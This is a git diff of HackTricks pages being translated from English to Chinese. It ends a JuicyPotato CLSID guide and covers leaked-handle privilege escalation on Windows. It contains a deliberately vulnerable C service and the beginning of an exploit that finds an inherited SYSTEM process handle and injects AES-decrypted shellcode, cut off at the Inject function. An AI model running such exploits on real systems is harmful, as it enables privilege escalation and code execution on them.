+下载 [Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1) 并将其加载到您的 PS 会话中，然后下载并执行 [GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1)。该脚本将创建一个可能的 CLSID 列表以供测试。
 
-Then download [test_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat)(change the path to the CLSID list and to the juicypotato executable) and execute it. It will start trying every CLSID, and **when the port number changes, it will mean that the CLSID worked**.
+然后下载 [test_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat)（更改 CLSID 列表和 juicypotato 可执行文件的路径）并执行它。它将开始尝试每个 CLSID，**当端口号改变时，这意味着 CLSID 有效**。
 
-**Check** the working CLSIDs **using the parameter -c**
+**检查** 有效的 CLSID **使用参数 -c**
 
-## References
+## 参考
 
 - [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md b/src/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
index be8aed0cb..707065c82 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
@@ -1,25 +1,25 @@
-# Leaked Handle Exploitation
+# 泄露句柄利用
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Introduction
+## 介绍
 
-Handles in a process allow to **access** different **Windows resources**:
+进程中的句柄允许**访问**不同的**Windows资源**：
 
-![RootedCON2022 - Exploiting Leaked Handles for LPE](<../../images/image (246).png>)
+![RootedCON2022 - 利用泄露句柄进行LPE](<../../images/image (246).png>)
 
-There have been already several **privilege escalation** cases where a **privileged process** with **open and inheritable handles** have **run** an **unprivileged process** giving it **access to all those handles**.
+已经有几个**权限提升**案例，其中一个**特权进程**具有**打开和可继承的句柄**，并且**运行**了一个**无特权进程**，使其**访问所有这些句柄**。
 
-For example, imagine that **a process running as SYSTEM open a new process** (`OpenProcess()`) with **full access**. The same process **also creates a new process** (`CreateProcess()`) **with low privileges but inheriting all the open handles of the main process**.\
-Then, if you have **full access to the low privileged process**, you can grab the **open handle to the privileged process created** with `OpenProcess()` and **inject a shellcode**.
+例如，想象一下**一个以SYSTEM身份运行的进程打开一个新进程**（`OpenProcess()`）并具有**完全访问权限**。同一个进程**还创建了一个新进程**（`CreateProcess()`），**具有低权限但继承了主进程的所有打开句柄**。\
+然后，如果你对这个低权限进程**拥有完全访问权限**，你可以获取**通过`OpenProcess()`创建的特权进程的打开句柄**并**注入一个shellcode**。
 
-## **Interesting Handles**
+## **有趣的句柄**
 
-### **Process**
+### **进程**
 
-As you read on the initial example if an **unprivileged process inherits a process handle** of a **privileged process** with enough permissions it will be able to execute **arbitrary code on it**.
+正如你在最初的例子中所读到的，如果一个**无特权进程继承了一个特权进程的句柄**，并且具有足够的权限，它将能够在其上执行**任意代码**。
 
-In [**this excellent article**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/) you can see how to exploit any process handle that has any of the following permissions:
+在[**这篇优秀的文章**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/)中，你可以看到如何利用任何具有以下权限的进程句柄：
 
 - PROCESS_ALL_ACCESS
 - PROCESS_CREATE_PROCESS
@@ -27,65 +27,64 @@ In [**this excellent article**](http://dronesec.pw/blog/2019/08/22/exploiting-le
 - PROCESS_DUP_HANDLE
 - PROCESS_VM_WRITE
 
-### Thread
+### 线程
 
-Similar to the process handles, if an **unprivileged process inherits a thread handle** of a **privileged process** with enough permissions it will be able to execute **arbitrary code on it**.
+与进程句柄类似，如果一个**无特权进程继承了一个特权进程的线程句柄**，并且具有足够的权限，它将能够在其上执行**任意代码**。
 
-In [**this excellent article**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/) you can also see how to exploit any process handle that has any of the following permissions:
+在[**这篇优秀的文章**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/)中，你也可以看到如何利用任何具有以下权限的进程句柄：
 
 - THREAD_ALL_ACCESS
 - THREAD_DIRECT_IMPERSONATION
 - THREAD_SET_CONTEXT
 
-### File, Key & Section Handles
+### 文件、键和节句柄
 
-If an **unprivileged process inherits** a **handle** with **write** equivalent **permissions** over a **privileged file or registry**, it will be able to **overwrite** the file/registry (and with a lot of **luck**, **escalate privileged**).
+如果一个**无特权进程继承了**一个**具有写入**等效**权限**的**句柄**，针对一个**特权文件或注册表**，它将能够**覆盖**该文件/注册表（并且在很多**运气**下，**提升权限**）。
 
-**Section Handles** are similar to file handles, the common name of this kinds of [objects is **"File Mapping"**](https://docs.microsoft.com/en-us/windows/win32/memory/file-mapping). They are used to work with **big files without keeping the entire** file in memory. That makes the exploitation kind of "similar" to the exploitation of a File Handle.
+**节句柄**类似于文件句柄，这类[对象的通用名称是**“文件映射”**](https://docs.microsoft.com/en-us/windows/win32/memory/file-mapping)。它们用于处理**大文件而不将整个**文件保留在内存中。这使得利用的方式与文件句柄的利用“相似”。
 
-## How to see handles of processes
+## 如何查看进程的句柄
 
-### Process Hacker
+### 进程黑客
 
-[**Process Hacker**](https://github.com/processhacker/processhacker) is a tool you can download for free. It has several amazing options to inspect processes and one of them is the **capability to see the handles of each process**.
+[**进程黑客**](https://github.com/processhacker/processhacker)是一个可以免费下载的工具。它有几个出色的选项来检查进程，其中之一是**查看每个进程的句柄的能力**。
 
-Note that in order to **see all the handles of all the processes, the SeDebugPrivilege is needed** (so you need to run Process Hacker as administrator).
+请注意，为了**查看所有进程的所有句柄，需要SeDebugPrivilege**（因此你需要以管理员身份运行进程黑客）。
 
-To see the handles of a process, right click in the process and select Handles:
+要查看进程的句柄，右键单击该进程并选择句柄：
 
 ![](<../../images/image (616).png>)
 
-You can then right click on the handle and **check the permissions**:
+然后你可以右键单击句柄并**检查权限**：
 
 ![](<../../images/image (946).png>)
 
-### Sysinternals Handles
+### Sysinternals句柄
 
-The [**Handles** ](https://docs.microsoft.com/en-us/sysinternals/downloads/handle)binary from Sysinternals will also list the handles per process in the console:
+[**句柄**](https://docs.microsoft.com/en-us/sysinternals/downloads/handle)二进制文件来自Sysinternals，也将在控制台中列出每个进程的句柄：
 
 ![](<../../images/image (720).png>)
 
 ### LeakedHandlesFinder
 
-[**This tool**](https://github.com/lab52io/LeakedHandlesFinder) allows you to **monitor** leaked **handles** and even **autoexploit** them to escalate privileges.
+[**这个工具**](https://github.com/lab52io/LeakedHandlesFinder)允许你**监控**泄露的**句柄**，甚至**自动利用**它们来提升权限。
 
-### Methodology
+### 方法论
 
-Now that you know how to find handles of processes what you need to check is if any **unprivileged process is having access to privileged handles**. In that case, the user of the process could be able to obtain the handle and abuse it to escalate privileges.
+现在你知道如何找到进程的句柄，你需要检查的是是否有任何**无特权进程正在访问特权句柄**。在这种情况下，进程的用户可能能够获取句柄并利用它来提升权限。
 
 > [!WARNING]
-> It was mentioned before that you need the SeDebugPrivilege to access all the handles. But a **user can still access the handles of his processes**, so it might be useful if you want to privesc just from that user to **execute the tools with the user regular permissions**.
+> 之前提到过，你需要SeDebugPrivilege才能访问所有句柄。但**用户仍然可以访问其进程的句柄**，因此如果你想仅从该用户提升权限，**以用户常规权限执行工具**可能会很有用。
 >
 > ```bash
 > handle64.exe /a | findstr /r /i "process thread file key pid:"
 > ```
 
-## Vulnerable Example
+## 漏洞示例
 
-For example, the following code belongs to a **Windows service** that would be vulnerable. The vulnerable code of this service binary is located inside the **`Exploit`** function. This function is starts **creating a new handle process with full access**. Then, it's **creating a low privileged process** (by copying the low privileged token of _explorer.exe_) executing _C:\users\username\desktop\client.exe_. The **vulnerability resides in the fact it's creating the low privileged process with `bInheritHandles` as `TRUE`**.
-
-Therefore, this low privileges process is able to grab the handle of the high privileged process crated first and inject and execute a shellcode (see next section).
+例如，以下代码属于一个**Windows服务**，该服务将是脆弱的。该服务二进制文件的脆弱代码位于**`Exploit`**函数内部。该函数开始**创建一个具有完全访问权限的新句柄进程**。然后，它**创建一个低权限进程**（通过复制_explorer.exe_的低权限令牌）执行_C:\users\username\desktop\client.exe_。**漏洞在于它创建低权限进程时将`bInheritHandles`设置为`TRUE`**。
 
+因此，这个低权限进程能够获取首先创建的高权限进程的句柄并注入和执行一个shellcode（见下一节）。
 ```c
 #include <windows.h>
 #include <tlhelp32.h>
@@ -101,206 +100,204 @@ HANDLE stopServiceEvent = 0;
 //Find PID of a proces from its name
 int FindTarget(const char *procname) {
 
-	HANDLE hProcSnap;
-	PROCESSENTRY32 pe32;
-	int pid = 0;
+HANDLE hProcSnap;
+PROCESSENTRY32 pe32;
+int pid = 0;
 
-	hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
-	if (INVALID_HANDLE_VALUE == hProcSnap) return 0;
+hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+if (INVALID_HANDLE_VALUE == hProcSnap) return 0;
 
-	pe32.dwSize = sizeof(PROCESSENTRY32);
+pe32.dwSize = sizeof(PROCESSENTRY32);
 
-	if (!Process32First(hProcSnap, &pe32)) {
-			CloseHandle(hProcSnap);
-			return 0;
-	}
+if (!Process32First(hProcSnap, &pe32)) {
+CloseHandle(hProcSnap);
+return 0;
+}
 
-	while (Process32Next(hProcSnap, &pe32)) {
-			if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
-					pid = pe32.th32ProcessID;
-					break;
-			}
-	}
+while (Process32Next(hProcSnap, &pe32)) {
+if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
+pid = pe32.th32ProcessID;
+break;
+}
+}
 
-	CloseHandle(hProcSnap);
+CloseHandle(hProcSnap);
 
-	return pid;
+return pid;
 }
 
 
 int Exploit(void) {
 
-  	STARTUPINFOA si;
-  	PROCESS_INFORMATION pi;
-	int pid = 0;
-  	HANDLE hUserToken;
-	HANDLE hUserProc;
-  	HANDLE hProc;
+STARTUPINFOA si;
+PROCESS_INFORMATION pi;
+int pid = 0;
+HANDLE hUserToken;
+HANDLE hUserProc;
+HANDLE hProc;
 
-	// open a handle to itself (privileged process) - this gets leaked!
-  	hProc = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());
+// open a handle to itself (privileged process) - this gets leaked!
+hProc = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());
 
-	// get PID of user low privileged process
-	if ( pid = FindTarget("explorer.exe") )
-		hUserProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
-	else
-		return -1;
+// get PID of user low privileged process
+if ( pid = FindTarget("explorer.exe") )
+hUserProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
+else
+return -1;
 
-	// extract low privilege token from a user's process
-    if (!OpenProcessToken(hUserProc, TOKEN_ALL_ACCESS, &hUserToken)) {
-        CloseHandle(hUserProc);
-        return -1;
-    }
+// extract low privilege token from a user's process
+if (!OpenProcessToken(hUserProc, TOKEN_ALL_ACCESS, &hUserToken)) {
+CloseHandle(hUserProc);
+return -1;
+}
 
-	// spawn a child process with low privs and leaked handle
-    ZeroMemory(&si, sizeof(si));
-    si.cb = sizeof(si);
-    ZeroMemory(&pi, sizeof(pi));
-    CreateProcessAsUserA(hUserToken, "C:\\users\\username\\Desktop\\client.exe",
-						NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
+// spawn a child process with low privs and leaked handle
+ZeroMemory(&si, sizeof(si));
+si.cb = sizeof(si);
+ZeroMemory(&pi, sizeof(pi));
+CreateProcessAsUserA(hUserToken, "C:\\users\\username\\Desktop\\client.exe",
+NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
 
-	CloseHandle(hProc);
-	CloseHandle(hUserProc);
-    return 0;
+CloseHandle(hProc);
+CloseHandle(hUserProc);
+return 0;
 }
 
 
 
 void WINAPI ServiceControlHandler( DWORD controlCode ) {
-	switch ( controlCode ) {
-		case SERVICE_CONTROL_SHUTDOWN:
-		case SERVICE_CONTROL_STOP:
-			serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
-			SetServiceStatus( serviceStatusHandle, &serviceStatus );
+switch ( controlCode ) {
+case SERVICE_CONTROL_SHUTDOWN:
+case SERVICE_CONTROL_STOP:
+serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
+SetServiceStatus( serviceStatusHandle, &serviceStatus );
 
-			SetEvent( stopServiceEvent );
-			return;
+SetEvent( stopServiceEvent );
+return;
 
-		case SERVICE_CONTROL_PAUSE:
-			break;
+case SERVICE_CONTROL_PAUSE:
+break;
 
-		case SERVICE_CONTROL_CONTINUE:
-			break;
+case SERVICE_CONTROL_CONTINUE:
+break;
 
-		case SERVICE_CONTROL_INTERROGATE:
-			break;
+case SERVICE_CONTROL_INTERROGATE:
+break;
 
-		default:
-			break;
-	}
-	SetServiceStatus( serviceStatusHandle, &serviceStatus );
+default:
+break;
+}
+SetServiceStatus( serviceStatusHandle, &serviceStatus );
 }
 
 void WINAPI ServiceMain( DWORD argc, TCHAR* argv[] ) {
-	// initialise service status
-	serviceStatus.dwServiceType = SERVICE_WIN32;
-	serviceStatus.dwCurrentState = SERVICE_STOPPED;
-	serviceStatus.dwControlsAccepted = 0;
-	serviceStatus.dwWin32ExitCode = NO_ERROR;
-	serviceStatus.dwServiceSpecificExitCode = NO_ERROR;
-	serviceStatus.dwCheckPoint = 0;
-	serviceStatus.dwWaitHint = 0;
+// initialise service status
+serviceStatus.dwServiceType = SERVICE_WIN32;
+serviceStatus.dwCurrentState = SERVICE_STOPPED;
+serviceStatus.dwControlsAccepted = 0;
+serviceStatus.dwWin32ExitCode = NO_ERROR;
+serviceStatus.dwServiceSpecificExitCode = NO_ERROR;
+serviceStatus.dwCheckPoint = 0;
+serviceStatus.dwWaitHint = 0;
 
-	serviceStatusHandle = RegisterServiceCtrlHandler( serviceName, ServiceControlHandler );
+serviceStatusHandle = RegisterServiceCtrlHandler( serviceName, ServiceControlHandler );
 
-	if ( serviceStatusHandle ) {
-		// service is starting
-		serviceStatus.dwCurrentState = SERVICE_START_PENDING;
-		SetServiceStatus( serviceStatusHandle, &serviceStatus );
+if ( serviceStatusHandle ) {
+// service is starting
+serviceStatus.dwCurrentState = SERVICE_START_PENDING;
+SetServiceStatus( serviceStatusHandle, &serviceStatus );
 
-		// do initialisation here
-		stopServiceEvent = CreateEvent( 0, FALSE, FALSE, 0 );
+// do initialisation here
+stopServiceEvent = CreateEvent( 0, FALSE, FALSE, 0 );
 
-		// running
-		serviceStatus.dwControlsAccepted |= (SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
-		serviceStatus.dwCurrentState = SERVICE_RUNNING;
-		SetServiceStatus( serviceStatusHandle, &serviceStatus );
+// running
+serviceStatus.dwControlsAccepted |= (SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
+serviceStatus.dwCurrentState = SERVICE_RUNNING;
+SetServiceStatus( serviceStatusHandle, &serviceStatus );
 
-		Exploit();
-		WaitForSingleObject( stopServiceEvent, -1 );
+Exploit();
+WaitForSingleObject( stopServiceEvent, -1 );
 
-		// service was stopped
-		serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
-		SetServiceStatus( serviceStatusHandle, &serviceStatus );
+// service was stopped
+serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
+SetServiceStatus( serviceStatusHandle, &serviceStatus );
 
-		// do cleanup here
-		CloseHandle( stopServiceEvent );
-		stopServiceEvent = 0;
+// do cleanup here
+CloseHandle( stopServiceEvent );
+stopServiceEvent = 0;
 
-		// service is now stopped
-		serviceStatus.dwControlsAccepted &= ~(SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
-		serviceStatus.dwCurrentState = SERVICE_STOPPED;
-		SetServiceStatus( serviceStatusHandle, &serviceStatus );
-	}
+// service is now stopped
+serviceStatus.dwControlsAccepted &= ~(SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
+serviceStatus.dwCurrentState = SERVICE_STOPPED;
+SetServiceStatus( serviceStatusHandle, &serviceStatus );
+}
 }
 
 
 void InstallService() {
-	SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CREATE_SERVICE );
+SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CREATE_SERVICE );
 
-	if ( serviceControlManager ) {
-		TCHAR path[ _MAX_PATH + 1 ];
-		if ( GetModuleFileName( 0, path, sizeof(path)/sizeof(path[0]) ) > 0 ) {
-			SC_HANDLE service = CreateService( serviceControlManager,
-							serviceName, serviceName,
-							SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
-							SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, path,
-							0, 0, 0, 0, 0 );
-			if ( service )
-				CloseServiceHandle( service );
-		}
-		CloseServiceHandle( serviceControlManager );
-	}
+if ( serviceControlManager ) {
+TCHAR path[ _MAX_PATH + 1 ];
+if ( GetModuleFileName( 0, path, sizeof(path)/sizeof(path[0]) ) > 0 ) {
+SC_HANDLE service = CreateService( serviceControlManager,
+serviceName, serviceName,
+SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
+SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, path,
+0, 0, 0, 0, 0 );
+if ( service )
+CloseServiceHandle( service );
+}
+CloseServiceHandle( serviceControlManager );
+}
 }
 
 void UninstallService() {
-	SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CONNECT );
+SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CONNECT );
 
-	if ( serviceControlManager ) {
-		SC_HANDLE service = OpenService( serviceControlManager,
-			serviceName, SERVICE_QUERY_STATUS | DELETE );
-		if ( service ) {
-			SERVICE_STATUS serviceStatus;
-			if ( QueryServiceStatus( service, &serviceStatus ) ) {
-				if ( serviceStatus.dwCurrentState == SERVICE_STOPPED )
-					DeleteService( service );
-			}
-			CloseServiceHandle( service );
-		}
-		CloseServiceHandle( serviceControlManager );
-	}
+if ( serviceControlManager ) {
+SC_HANDLE service = OpenService( serviceControlManager,
+serviceName, SERVICE_QUERY_STATUS | DELETE );
+if ( service ) {
+SERVICE_STATUS serviceStatus;
+if ( QueryServiceStatus( service, &serviceStatus ) ) {
+if ( serviceStatus.dwCurrentState == SERVICE_STOPPED )
+DeleteService( service );
+}
+CloseServiceHandle( service );
+}
+CloseServiceHandle( serviceControlManager );
+}
 }
 
 int _tmain( int argc, TCHAR* argv[] )
 {
-	if ( argc > 1 && lstrcmpi( argv[1], TEXT("install") ) == 0 ) {
-		InstallService();
-	}
-	else if ( argc > 1 && lstrcmpi( argv[1], TEXT("uninstall") ) == 0 ) {
-		UninstallService();
-	}
-	else  {
-		SERVICE_TABLE_ENTRY serviceTable[] = {
-			{ serviceName, ServiceMain },
-			{ 0, 0 }
-		};
+if ( argc > 1 && lstrcmpi( argv[1], TEXT("install") ) == 0 ) {
+InstallService();
+}
+else if ( argc > 1 && lstrcmpi( argv[1], TEXT("uninstall") ) == 0 ) {
+UninstallService();
+}
+else  {
+SERVICE_TABLE_ENTRY serviceTable[] = {
+{ serviceName, ServiceMain },
+{ 0, 0 }
+};
 
-		StartServiceCtrlDispatcher( serviceTable );
-	}
+StartServiceCtrlDispatcher( serviceTable );
+}
 
-	return 0;
+return 0;
 }
 ```
-
 ### Exploit Example 1
 
 > [!NOTE]
-> In a real scenario you probably **won't be able to control the binary** that is going to be executed by the vulnerable code (_C:\users\username\desktop\client.exe_ in this case). Probably you will **compromise a process and you will need to look if you can access any vulnerable handle of any privileged process**.
-
-In this example you can find the code of a possible exploit for _C:\users\username\desktop\client.exe_.\
-The most interesting part of this code is located in `GetVulnProcHandle`. This function will **start fetching all the handles**, then it will **check if any of them belongs to the same PID** and if the handle belongs to a **process**. If all these requirements are completed (an accessible open process handle is found) , it try to **inject and execute a shellcode abusing the handle of the process**.\
-The injection of the shellcode is done inside the **`Inject`** function and it will just **write the shellcode inside the privileged process and create a thread inside the same process** to execute the shellcode).
+> 在实际场景中，您可能**无法控制将由易受攻击的代码执行的二进制文件**（在这种情况下为 _C:\users\username\desktop\client.exe_）。您可能会**妥协一个进程，并需要查看是否可以访问任何特权进程的任何易受攻击的句柄**。
 
+在这个例子中，您可以找到 _C:\users\username\desktop\client.exe_ 的一个可能的利用代码。\
+这段代码中最有趣的部分位于 `GetVulnProcHandle`。这个函数将**开始获取所有句柄**，然后**检查它们是否属于同一个 PID**，并且句柄是否属于一个**进程**。如果满足所有这些要求（找到一个可访问的打开进程句柄），它将尝试**注入并执行一个利用该进程句柄的 shellcode**。\
+shellcode 的注入是在 **`Inject`** 函数内部完成的，它将**在特权进程内部写入 shellcode，并在同一进程内部创建一个线程**来执行 shellcode。
 ```c
 #include <windows.h>
 #include <stdio.h>
@@ -318,201 +315,199 @@ The injection of the shellcode is done inside the **`Inject`** function and it w
 
 
 int AESDecrypt(char * payload, unsigned int payload_len, char * key, size_t keylen) {
-        HCRYPTPROV hProv;
-        HCRYPTHASH hHash;
-        HCRYPTKEY hKey;
+HCRYPTPROV hProv;
+HCRYPTHASH hHash;
+HCRYPTKEY hKey;
 
-        if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
-                return -1;
-        }
-        if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
-                return -1;
-        }
-        if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)){
-                return -1;
-        }
-        if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
-                return -1;
-        }
+if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
+return -1;
+}
+if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
+return -1;
+}
+if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)){
+return -1;
+}
+if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
+return -1;
+}
 
-        if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, payload, &payload_len)){
-                return -1;
-        }
+if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, payload, &payload_len)){
+return -1;
+}
 
-        CryptReleaseContext(hProv, 0);
-        CryptDestroyHash(hHash);
-        CryptDestroyKey(hKey);
+CryptReleaseContext(hProv, 0);
+CryptDestroyHash(hHash);
+CryptDestroyKey(hKey);
 
-        return 0;
+return 0;
 }
 
 
 HANDLE GetVulnProcHandle(void) {
 
-	ULONG handleInfoSize = 0x10000;
-    NTSTATUS status;
-    PSYSTEM_HANDLE_INFORMATION phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) malloc(handleInfoSize);
-	HANDLE hProc = NULL;
-	POBJECT_TYPE_INFORMATION objectTypeInfo;
-	PVOID objectNameInfo;
-	UNICODE_STRING objectName;
-    ULONG returnLength;
-    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
-    DWORD dwOwnPID = GetCurrentProcessId();
+ULONG handleInfoSize = 0x10000;
+NTSTATUS status;
+PSYSTEM_HANDLE_INFORMATION phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) malloc(handleInfoSize);
+HANDLE hProc = NULL;
+POBJECT_TYPE_INFORMATION objectTypeInfo;
+PVOID objectNameInfo;
+UNICODE_STRING objectName;
+ULONG returnLength;
+HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
+DWORD dwOwnPID = GetCurrentProcessId();
 
-    pNtQuerySystemInformation = GetProcAddress(hNtdll, "NtQuerySystemInformation");
-    pNtDuplicateObject = GetProcAddress(hNtdll, "NtDuplicateObject");
-    pNtQueryObject = GetProcAddress(hNtdll, "NtQueryObject");
-    pRtlEqualUnicodeString = GetProcAddress(hNtdll, "RtlEqualUnicodeString");
-    pRtlInitUnicodeString = GetProcAddress(hNtdll, "RtlInitUnicodeString");
+pNtQuerySystemInformation = GetProcAddress(hNtdll, "NtQuerySystemInformation");
+pNtDuplicateObject = GetProcAddress(hNtdll, "NtDuplicateObject");
+pNtQueryObject = GetProcAddress(hNtdll, "NtQueryObject");
+pRtlEqualUnicodeString = GetProcAddress(hNtdll, "RtlEqualUnicodeString");
+pRtlInitUnicodeString = GetProcAddress(hNtdll, "RtlInitUnicodeString");
 
-    printf("[+] Grabbing handles...");
+printf("[+] Grabbing handles...");
 
-    while ((status = pNtQuerySystemInformation( SystemHandleInformation, phHandleInfo, handleInfoSize,
-											NULL )) == STATUS_INFO_LENGTH_MISMATCH)
-        phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) realloc(phHandleInfo, handleInfoSize *= 2);
+while ((status = pNtQuerySystemInformation( SystemHandleInformation, phHandleInfo, handleInfoSize,
+NULL )) == STATUS_INFO_LENGTH_MISMATCH)
+phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) realloc(phHandleInfo, handleInfoSize *= 2);
 
-    if (status != STATUS_SUCCESS)
-    {
-        printf("[!] NtQuerySystemInformation failed!\n");
-        return 0;
-    }
+if (status != STATUS_SUCCESS)
+{
+printf("[!] NtQuerySystemInformation failed!\n");
+return 0;
+}
 
-    printf("done.\n[+] Fetched %d handles.\n", phHandleInfo->NumberOfHandles);
+printf("done.\n[+] Fetched %d handles.\n", phHandleInfo->NumberOfHandles);
 
-    // iterate handles until we find the privileged process handle
-    for (int i = 0; i < phHandleInfo->NumberOfHandles; ++i)
-    {
-        SYSTEM_HANDLE_TABLE_ENTRY_INFO handle = phHandleInfo->Handles[i];
+// iterate handles until we find the privileged process handle
+for (int i = 0; i < phHandleInfo->NumberOfHandles; ++i)
+{
+SYSTEM_HANDLE_TABLE_ENTRY_INFO handle = phHandleInfo->Handles[i];
 
-        // Check if this handle belongs to our own process
-        if (handle.UniqueProcessId != dwOwnPID)
-            continue;
+// Check if this handle belongs to our own process
+if (handle.UniqueProcessId != dwOwnPID)
+continue;
 
-        objectTypeInfo = (POBJECT_TYPE_INFORMATION) malloc(0x1000);
-        if (pNtQueryObject( (HANDLE) handle.HandleValue,
-						ObjectTypeInformation,
-						objectTypeInfo,
-						0x1000,
-						NULL ) != STATUS_SUCCESS)
-            continue;
+objectTypeInfo = (POBJECT_TYPE_INFORMATION) malloc(0x1000);
+if (pNtQueryObject( (HANDLE) handle.HandleValue,
+ObjectTypeInformation,
+objectTypeInfo,
+0x1000,
+NULL ) != STATUS_SUCCESS)
+continue;
 
-		// skip some objects to avoid getting stuck
-		// see: https://github.com/adamdriscoll/PoshInternals/issues/7
-        if (handle.GrantedAccess == 0x0012019f
-			&& handle.GrantedAccess != 0x00120189
-			&& handle.GrantedAccess != 0x120089
-			&& handle.GrantedAccess != 0x1A019F ) {
-            free(objectTypeInfo);
-            continue;
-        }
+// skip some objects to avoid getting stuck
+// see: https://github.com/adamdriscoll/PoshInternals/issues/7
+if (handle.GrantedAccess == 0x0012019f
+&& handle.GrantedAccess != 0x00120189
+&& handle.GrantedAccess != 0x120089
+&& handle.GrantedAccess != 0x1A019F ) {
+free(objectTypeInfo);
+continue;
+}
 
-		// get object name information
-        objectNameInfo = malloc(0x1000);
-        if (pNtQueryObject( (HANDLE) handle.HandleValue,
-						ObjectNameInformation,
-						objectNameInfo,
-						0x1000,
-						&returnLength ) != STATUS_SUCCESS) {
+// get object name information
+objectNameInfo = malloc(0x1000);
+if (pNtQueryObject( (HANDLE) handle.HandleValue,
+ObjectNameInformation,
+objectNameInfo,
+0x1000,
+&returnLength ) != STATUS_SUCCESS) {
 
-			// adjust the size of a returned object and query again
-			objectNameInfo = realloc(objectNameInfo, returnLength);
-            if (pNtQueryObject( (HANDLE) handle.HandleValue,
-							ObjectNameInformation,
-							objectNameInfo,
-							returnLength,
-							NULL ) != STATUS_SUCCESS) {
-                free(objectTypeInfo);
-                free(objectNameInfo);
-                continue;
-            }
-        }
+// adjust the size of a returned object and query again
+objectNameInfo = realloc(objectNameInfo, returnLength);
+if (pNtQueryObject( (HANDLE) handle.HandleValue,
+ObjectNameInformation,
+objectNameInfo,
+returnLength,
+NULL ) != STATUS_SUCCESS) {
+free(objectTypeInfo);
+free(objectNameInfo);
+continue;
+}
+}
 
-        // check if we've got a process object
-        objectName = *(PUNICODE_STRING) objectNameInfo;
-        UNICODE_STRING pProcess;
+// check if we've got a process object
+objectName = *(PUNICODE_STRING) objectNameInfo;
+UNICODE_STRING pProcess;
 
-        pRtlInitUnicodeString(&pProcess, L"Process");
-        if (pRtlEqualUnicodeString(&objectTypeInfo->TypeName, &pProcess, TRUE)) {
-            printf("[+] Found process handle (%x)\n", handle.HandleValue);
-            hProc = (HANDLE) handle.HandleValue;
-			free(objectTypeInfo);
-			free(objectNameInfo);
-			break;
-        }
-        else
-            continue;
+pRtlInitUnicodeString(&pProcess, L"Process");
+if (pRtlEqualUnicodeString(&objectTypeInfo->TypeName, &pProcess, TRUE)) {
+printf("[+] Found process handle (%x)\n", handle.HandleValue);
+hProc = (HANDLE) handle.HandleValue;
+free(objectTypeInfo);
+free(objectNameInfo);
+break;
+}
+else
+continue;
 
-        free(objectTypeInfo);
-        free(objectNameInfo);
-    }
+free(objectTypeInfo);
+free(objectNameInfo);
+}
 
-	return hProc;
+return hProc;
 }
 
 int Inject(HANDLE hProc, unsigned char * payload, unsigned int payload_len) {
 
-	LPVOID pRemoteCode = NULL;
-    HANDLE hThread = NULL;
-	BOOL bStatus = FALSE;
